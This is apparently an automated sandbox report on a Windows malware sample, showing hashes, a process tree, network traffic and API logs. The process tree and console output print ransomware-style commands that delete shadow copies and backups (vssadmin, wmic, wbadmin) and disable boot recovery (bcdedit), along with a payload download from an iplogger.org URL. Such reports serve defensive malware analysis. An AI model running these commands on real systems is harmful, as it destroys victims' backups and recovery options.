Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 1, 2021, 9:32 a.m.	Sept. 1, 2021, 9:41 a.m.

Size	416.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`dcef208fcdac3345c6899a478d16980f`
SHA256	`824a76c39895bc3ad4f5dfc27fc3ac80d26514118c4669505a1f0cfdc8fdbcdc`
CRC32	`D886582B`
ssdeep	`6144:iYdiLQNWloaXoLJYksETr0vpvejH6ols25A0LJjI4WHB/N7:BiLQqosgZs+8vejap0LJ6h`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

pattern.exe "C:\Users\test22\AppData\Local\Temp\pattern.exe"
2072
- csrss.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
  1456
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    2884
    - WMIC.exe wmic shadowcopy delete
      1976
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    2944
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    2312
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    1080
  - cmd.exe "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3024
    - vssadmin.exe vssadmin delete shadows /all /quiet
      2128
  - cmd.exe "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
    2656
    - WMIC.exe wmic shadowcopy delete
      2236
    - vssadmin.exe vssadmin delete shadows /all /quiet
      808

Name	Response	Post-Analysis Lookup
www.geodatatool.com	A 158.69.65.151	158.69.65.151
geoiptool.com	A 158.69.65.151	158.69.65.151
iplogger.org	A 88.99.66.31	88.99.66.31

IP Address	Status	Action
158.69.65.151	Active	Moloch
164.124.101.2	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49209 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49203 -> 158.69.65.151:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49207 -> 158.69.65.151:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49206 -> 158.69.65.151:80	2015500	ET POLICY Geo Location IP info online service (geoiptool.com)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 158.69.65.151:80	2015500	ET POLICY Geo Location IP info online service (geoiptool.com)	Potential Corporate Privacy Violation

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49209 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.101:49203 158.69.65.151:443	C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA	OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com	e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f
TLSv1 192.168.56.101:49207 158.69.65.151:443	C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA	OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com	e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 1, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 1, 2021, 9:39 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 1, 2021, 9:39 a.m.			0	0
IsDebuggerPresent Sept. 1, 2021, 9:39 a.m.			0	0

Command line console output was observed (39 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: bcdedit console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: /set {default} bootstatuspolicy ignoreallfailures console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: bcdedit console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: /set {default} recoveryenabled no console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: delete catalog -quiet console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: delete systemstatebackup console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: delete systemstatebackup -keepversions:0 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: delete backup console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: shadowcopy delete console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: vssadmin console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: delete shadows /all /quiet console_handle: 0x00000007	1	1
WriteConsoleA Sept. 1, 2021, 9:39 a.m.	buffer: ERROR: Description = Initialization failure console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: Error: Unexpected failure: Class not registered console_handle: 0x00000007	1	1
WriteConsoleA Sept. 1, 2021, 9:39 a.m.	buffer: ERROR: Description = Initialization failure console_handle: 0x0000000b	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 1, 2021, 9:39 a.m.	buffer: Error: Unexpected failure: Class not registered console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.code
section	.rdatau

One or more processes crashed (5 events)

Time & API	Arguments	Status
__exception__ Sept. 1, 2021, 9:32 a.m.	stacktrace: pattern+0x2de87 @ 0x42de87 pattern+0x2e6a3 @ 0x42e6a3 pattern+0x31781 @ 0x431781 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: df 2c 01 df 28 83 f9 08 7e 11 df 68 08 83 f9 10 exception.symbol: pattern+0x3031 exception.address: 0x403031 exception.module: pattern.exe exception.exception_code: 0xc0000005 exception.offset: 12337 registers.esp: 1637920 registers.edi: 5636352 registers.eax: 0 registers.ebp: 1637976 registers.edx: 34012760 registers.ebx: 27721728 registers.esi: 1638008 registers.ecx: 24	1
__exception__ Sept. 1, 2021, 9:39 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 40037888 registers.edi: 3205308 registers.eax: 40037888 registers.ebp: 40037968 registers.edx: 2918196 registers.ebx: 40038252 registers.esi: 2147746133 registers.ecx: 2974992	1
__exception__ Sept. 1, 2021, 9:39 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72506f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72506e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x725027a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72502652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7250253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72502411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x725025ab wmic+0x39c80 @ 0x1f9c80 wmic+0x3b06a @ 0x1fb06a wmic+0x3b1f8 @ 0x1fb1f8 wmic+0x36fcd @ 0x1f6fcd wmic+0x3d6e9 @ 0x1fd6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1369624 registers.edi: 1957755408 registers.eax: 1369624 registers.ebp: 1369704 registers.edx: 1 registers.ebx: 2944620 registers.esi: 2147746133 registers.ecx: 2630094028	1
__exception__ Sept. 1, 2021, 9:39 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 41546012 registers.edi: 4839260 registers.eax: 41546012 registers.ebp: 41546092 registers.edx: 4556596 registers.ebx: 41546376 registers.esi: 2147746133 registers.ecx: 4613392	1
__exception__ Sept. 1, 2021, 9:39 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x721b6f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x721b6e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x721b27a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x721b2652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x721b253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x721b2411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x721b25ab wmic+0x39c80 @ 0x1f9c80 wmic+0x3b06a @ 0x1fb06a wmic+0x3b1f8 @ 0x1fb1f8 wmic+0x36fcd @ 0x1f6fcd wmic+0x3d6e9 @ 0x1fd6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3139640 registers.edi: 1957755408 registers.eax: 3139640 registers.ebp: 3139720 registers.edx: 1 registers.ebx: 4583020 registers.esi: 2147746133 registers.ecx: 2630317271	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://geoiptool.com/
suspicious_features	GET method with no useragent header				suspicious_request	GET https://www.geodatatool.com/

Performs some HTTP requests (4 events)

request	GET http://geoiptool.com/
request	GET http://iplogger.org/1L3ig7.gz
request	GET https://www.geodatatool.com/
request	GET https://iplogger.org/1L3ig7.gz

Allocates read-write-execute memory (usually to unpack itself) (6 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 2072 region_size: 1331200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 2072 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1331200 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 1456 region_size: 1331200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 9:32 a.m.	process_identifier: 1456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1331200 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 1, 2021, 9:39 a.m.	process_identifier: 1976 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x724b1000 process_handle: 0xffffffff	1
